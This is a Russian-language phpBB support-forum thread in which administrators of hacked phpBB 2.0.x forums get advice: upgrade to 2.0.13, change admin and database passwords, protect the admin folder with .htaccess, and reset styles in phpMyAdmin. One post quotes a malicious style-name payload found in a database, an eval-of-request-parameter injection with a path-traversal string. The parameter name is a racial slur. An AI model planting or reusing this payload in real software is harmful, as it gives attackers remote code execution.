[Барминовский]

Здравствуйте! У меня такая проблема. Сегодня мой форум был 2 раза взломан. Я в расстерянности.
Пользователь некто P06uH30H после того, как зарегистрировался "убил" все форумы. Мой форум находится здесь http://studio-77.hut1.ru/phpBB2/
Вот, что он мне написал, после того, как я заново установил форум:http://studio-77.hut1.ru/phpBB2/viewtopic.php?t=2
Как мне защитить форум от взлома?

[newest]

версия форума?
когда вы его проапгрейдили?
а пароли поменяли?

[Барминовский]

newest писал(а):версия форума?
когда вы его проапгрейдили?

phpBB-2.0.13
апгрейд часов пять назад зделал.

newest писал(а):а пароли поменяли?

пароли - нет

[newest]

Барминовский писал(а):пароли - нет

ну поэтому он вас и ломает.. хоть 10 раз проапгрейдитесь.. пароли надо менять.. тогда он не сможет ничего сделать..

поменяйте пароли.. установите форум.. спите спокойно..

[Егор Наклоняев]

Барминовский
Ну и админку закройте с помощью .htaccess. Тема уже здесь обсуждалась. Поиск по ключевому слову htaccess
Учим матчасть:
http://phpbbguru.net/community/viewtopic.php?t=2061

[Kevin]

У меня тоже неделю назад взломали форум,
но у меня сначало сложилось впечатление,
что вскрыли админский пароль, потому как
просто грохнули все форумы и категории со
всеми сообщениями

Версия была 2.0.11

Покопав БД обнаружил новый шаблон(стиль) с заголовком:

Код: Выделить всё

aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp

Что случилось, как форум был взломан?

PS. Склоняюсь к мысле сменить движек форума...

[crash]

Kevin
просто предохраняться надо.. уже месяц всем кричат "обновите версию форума до последней (конкретно это было залатано в 2.0.13) ... но мы все крутые и думаем, а чего мой форум то ломать...

Kevin писал(а):PS. Склоняюсь к мысле сменить движек форума...

при вашем отношении к безопасности это ни к чему не приведет

[Vladson]

Kevin писал(а):Покопав БД обнаружил новый шаблон(стиль) с заголовком

Это кто-то "сплойт" (который позволяет выполнять произвольные комманды на серавере) но воспользоваться им можно только имея админские прова, избавиться от этого просто, надо удалить этот стиль, затем обновить версию до последней (конкретно это было залатано в 2.0.13), затем сменить все админские пароли (желательно одновременно)

Добавлено спустя 59 секунд:

доп-инфо - http://www.securitylab.ru/53295.html

[avm]

Барминовский, вы кстати не забыли сменить пароль доступа к БД? Он указывается в config.php, а то раньше у вас была ситуация - в первом форуме одна тема и в ней два сообщения (ваше и его), а счетчик сообщений на титульной странице показывал 0 (при этом судя по подписи внизу у вас стоял уже 2.0.13). Это говорит о том, что скорее всего у этого хацкера есть прямой доступ к вашей БД...

[Егор Наклоняев]

Барминовский
1. Перестать биться в истерике.
2. Если есть аська и АйПи начинать давить на психику. Учтите, взлом форума квалифицируется по статье 273 п.1 УК РФ (до 3х лет). Правда, 14 летние дети неподсудны по этой статье, но это не обязательно афишировать. Все эти юные кулхацкеры храбры, пока их не ткнешь носом аки кутёнка. Скорее всего, дитё даже не умеет пользоваться анонимными прокси.
3. Файл .htaccess создайтся в любом текстовом редакторе. Либо обратитесь к хостеру, чтобы закрыл каталог admin паролем. Это можно сделать в конфигурации сервера.

[sPaG]

Поломали меня...

а вернуть старые настроки что бы по дефалту был субсильвер стиль никак нельзя?

[L@SS@RD]

sPaG можно.
Если у вас есть доступ к phpMyAdmin'у на сервере.
Вам нужна таблица: phpbb_config
Нужно изменить 2 поля:
1. override_user_style
значение изменить на "1" (без кавычек)
2. default_style
заменить тоже на "1", так как сабСильвер по умолчанию первым стоит, если не так, то измените на другой.

[andreysmorya]

"Если у вас есть доступ к phpMyAdmin'у на сервере "
Поясните пожалуйста подробно - пошагово где "это" искать - править.

[L@SS@RD]

andreysmorya, это приложение(набор скриптов) на вашем сервере, позволяющее управлять базами данных.
Если хостинг платный, то 99.9% что он должен быть установлен, смотрите в контрольной панели управления сайтом.
Если хостинг бесплатный, то вроятность присутствия пхпМайАдмина снижается.

Можно спросить у службы поддержки его местонахождение.

phpMyAdmin имеет интуитивно понятный интерфейс. Слева фрейм со списком имеющихся у вас баз данных, справа дополнительная информация, а при выборе БД, то её содержимое, т.е. таблицы.

Когда вы в левом фрейме выберите свою БД, ту, которую использует ваш форум (можно посмотреть в конфиге, если забыли), - справа появятся её таблицы.
Как я уже писал выше, вам необходимо выбрать таблицу phpbb_config
Открыть её на просмотр, напротив от таблицы есть кнопочки, выбирайте "Обзор".
Откроется содержмое данной таблицы.(учтите, содержимое находится на нескольких страницах) Далее ищете поля с названиями override_user_style и default_style. И тому и другому полю нужно присвоить значение "1".
Чтобы редактировать какое-либо поле, слева от него существует кнопочка "Правка".

Если что не ясно, пишите.

[andreysmorya]

L@SS@RD, спасибо, хостинг платный, только как и везде оперативные ответы от них на стадии "приема оплаты" далее "не беспокойте нас по пустякам" попробую разобраться...